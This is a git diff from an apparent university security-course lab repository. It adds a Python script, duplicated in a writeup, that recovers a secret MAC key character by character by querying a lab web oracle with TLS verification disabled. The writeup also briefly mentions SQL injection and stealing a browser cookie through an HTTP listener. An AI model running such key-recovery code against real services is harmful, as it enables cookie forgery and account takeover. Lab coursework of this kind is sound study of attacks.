Diffstat (limited to 'csci5271/ho2')
-rw-r--r--csci5271/ho2/crack6.py24
-rw-r--r--csci5271/ho2/writeup.md28
2 files changed, 48 insertions, 4 deletions
diff --git a/csci5271/ho2/crack6.py b/csci5271/ho2/crack6.py
index 60b5a3b..55a9263 100644
--- a/csci5271/ho2/crack6.py
+++ b/csci5271/ho2/crack6.py
@@ -1,6 +1,22 @@
-# SHA! Key guesser
-import hashlib
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import string
-name = "admin"
-response = "a1a9f3ebd29ff76d45a609d98e0ec31e83dfbd4d"
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+actual = ""
+key = "Z"*19
+for n in range(19, -1, -1):
+ res2 = requests.get("https://192.168.14.1/mac-cookie?username="+key,
+ verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0]
+ for c in string.printable:
+ test = key[:n] + c
+ res1 = requests.get("https://192.168.14.1/mac-cookie?username="+test,
+ verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0]
+ print(test, res1, res2)
+ if res1 == res2:
+ actual = c + actual
+ break
+ key = key[:-1]
+
+print("Key is", actual)
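Review bot: Both `requests.get` calls pass `verify=False` and the `disable_warnings(InsecureRequestWarning)` line silences the resulting warning, so TLS certificate validation is off for every request, yet the hunk also drops the old `# SHA! Key guesser` header without replacing it, leaving nothing in the file that says this is deliberate for the lab host. A comment above the `disable_warnings` line such as `# TLS certificate verification is disabled on purpose for the lab host 192.168.14.1` would record the intent, and a module docstring stating what the script reconstructs and from which endpoint would restore the lost header. Style: the parsing chain `.text.replace(".", "").split(" ")[-1].split('\n')[0]` is duplicated at both call sites, so a small helper taking the username and returning the parsed value would remove the repetition, and the hard-coded base URL would read better as a named constant.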
diff --git a/csci5271/ho2/writeup.md b/csci5271/ho2/writeup.md
index e752fcb..56d617d 100644
--- a/csci5271/ho2/writeup.md
+++ b/csci5271/ho2/writeup.md
@@ -95,3 +95,31 @@ The secret to figuring out the SQL injection was ~~trying everything~~ tuning th
The main additional thing I did was start up a `SimpleHTTPServer` on port 8080 of the server I have SSH access to. The attack works because the server is making an HTTP request to that port with the cookie being that of the browser.
# 6
+## Code
+```python
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import string
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+actual = ""
+key = "Z"*19
+for n in range(19, -1, -1):
+ res2 = requests.get("https://192.168.14.1/mac-cookie?username="+key,
+ verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0]
+ for c in string.printable:
+ test = key[:n] + c
+ res1 = requests.get("https://192.168.14.1/mac-cookie?username="+test,
+ verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0]
+ print(test, res1, res2)
+ if res1 == res2:
+ actual = c + actual
+ break
+ key = key[:-1]
+
+print("Key is", actual)
+```
+
+## Key
+`###################k`